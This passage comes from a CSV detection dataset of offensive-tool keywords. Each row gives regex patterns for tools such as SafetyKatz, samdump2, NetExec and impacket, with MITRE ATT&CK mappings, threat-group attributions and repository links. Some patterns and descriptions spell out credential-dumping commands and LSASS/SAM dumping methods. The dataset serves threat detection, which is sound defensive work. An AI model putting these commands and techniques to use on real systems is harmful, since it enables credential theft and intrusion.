"*SafetyKatz.csproj*",".{0,1000}SafetyKatz\.csproj.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57868" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","57869" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57870" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57871" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","57872" "*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","57873" "*SafetyKatz.json*",".{0,1000}SafetyKatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","57874" "*SafetyKatz.Program*",".{0,1000}SafetyKatz\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57875" "*SafetyKatz.sln*",".{0,1000}SafetyKatz\.sln.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57876" "*safetykatz.txt*",".{0,1000}safetykatz\.txt.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57877" "*SafetyKatzManager*",".{0,1000}SafetyKatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57878" "*SafetyKatz-master*",".{0,1000}SafetyKatz\-master.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. 
First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57879" "*sahadnk72/jecretz*",".{0,1000}sahadnk72\/jecretz.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","1","N/A","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","57880" "*sAINT*launch4j.tar.xz*",".{0,1000}sAINT.{0,1000}launch4j\.tar\.xz.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57881" "*sAINT\lib\activation.jar*",".{0,1000}sAINT\\lib\\activation\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57882" "*saint-1.0-jar-with-dependencies.exe*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows 
systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57883" "*saint-1.0-jar-with-dependencies.jar*",".{0,1000}saint\-1\.0\-jar\-with\-dependencies\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","57884" "*Salsa-tools*",".{0,1000}Salsa\-tools.{0,1000}","offensive_tool_keyword","Salsa-tools","Salsa Tools - An AV-Safe Reverse Shell dipped on bellota sauce Salsa Tools is a collection of three different tools that combined. allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for its execution. In order to avoid the latest detection techniques (AMSI). most of the components were initially written on C#. 
Salsa Tools was publicly released by Luis Vacas during his Talk Inmersión en la explotación tiene rima which took place during h-c0n in 9th February 2019","T1027 - T1036 - T1059 - T1071 - T1073 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/Hackplayers/Salsa-tools","1","0","N/A","N/A","N/A","10","580","131","2020-01-31T22:41:35Z","2019-02-04T21:31:28Z","57885" "*--sam --dump-method cmd*",".{0,1000}\-\-sam\s\-\-dump\-method\scmd.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57886" "*--sam --dump-method powershell*",".{0,1000}\-\-sam\s\-\-dump\-method\spowershell.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","57887" "*SAM hashes extraction failed: *",".{0,1000}SAM\shashes\sextraction\sfailed\:\s.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57888" "*SAM hashes extraction for user * failed*",".{0,1000}SAM\shashes\sextraction\sfor\suser\s.{0,1000}\sfailed.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI 
credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","57889" "*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","57890" "*SAM\*-SAMHashes.txt*",".{0,1000}SAM\\.{0,1000}\-SAMHashes\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","57891" "*SAM\.Sam-Full.txt*",".{0,1000}SAM\\\.Sam\-Full\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","57892" "*sam_the_admin.py*",".{0,1000}sam_the_admin\.py.{0,1000}","offensive_tool_keyword","sam-the-admin","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1208 - T1218.005 - T1055.002","TA0006 - TA0007 - TA0008","N/A","N/A","Exploitation tool","https://github.com/WazeHell/sam-the-admin/tree/main/utils","1","0","N/A","N/A","N/A","10","1012","193","2022-07-10T22:23:13Z","2021-12-11T15:10:30Z","57893" "*SamAdduser.exe*",".{0,1000}SamAdduser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - 
Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","57894" "*sambaPipe.py*",".{0,1000}sambaPipe\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57895" "*samdump *","samdump\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - 
T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57896" "*samdump(bearer, commands*",".{0,1000}samdump\(bearer,\scommands.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","57897" "*samdump.exe*",".{0,1000}samdump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","57898" "*samdump.py*",".{0,1000}samdump\.py.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","57899" "*samdump.zip*",".{0,1000}samdump\.zip.{0,1000}","offensive_tool_keyword","samdump","Dumping sam","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","N/A","1","4","1","2024-06-27T09:35:42Z","2023-04-16T01:49:12Z","57900" "*samdump2 *",".{0,1000}samdump2\s.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential 
Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","57901" "*samdump2 SYSTEM SAM > *",".{0,1000}samdump2\sSYSTEM\sSAM\s\>\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","57902" "*samdump2 SYSTEM SAM*",".{0,1000}samdump2\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","57903" "*samdump2.c*",".{0,1000}samdump2\.c.{0,1000}","offensive_tool_keyword","samdump2","Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.","T1003.002 - T1564.001","TA0006 - TA0010","N/A","Black Basta","Credential Access","https://salsa.debian.org/pkg-security-team/samdump2","1","0","N/A","N/A","10","6","N/A","N/A","N/A","N/A","57904" "*sampasswd -*",".{0,1000}sampasswd\s\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57917" "*sample_brc4.json*",".{0,1000}sample_brc4\.json.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - 
TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","0","N/A","N/A","10","10","294","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z","57918" "*sample_files/passwd*",".{0,1000}sample_files\/passwd.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","57919" "*samr_##*",".{0,1000}samr_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society 
- Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","57920" "*samratashok/nishang*",".{0,1000}samratashok\/nishang.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","57921" "*samratashok/nishang*",".{0,1000}samratashok\/nishang.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","57922" "*samrdump.py*",".{0,1000}samrdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","57923" "*samunlock -*",".{0,1000}samunlock\s\-.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57924" "*samusrgrp -a *",".{0,1000}samusrgrp\s\-a\s.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57925" "*samusrgrp -r *",".{0,1000}samusrgrp\s\-r\s.{0,1000}","offensive_tool_keyword","chntpw","reset a password on your system","T1003 - T1078","TA0006","N/A","N/A","Credential Access","https://pogostick.net/~pnh/ntpasswd/chntpw-source-140201.zip","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","57926" "*Sandbox detected - Filename changed :( *",".{0,1000}Sandbox\sdetected\s\-\sFilename\schanged\s\:\(\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense 
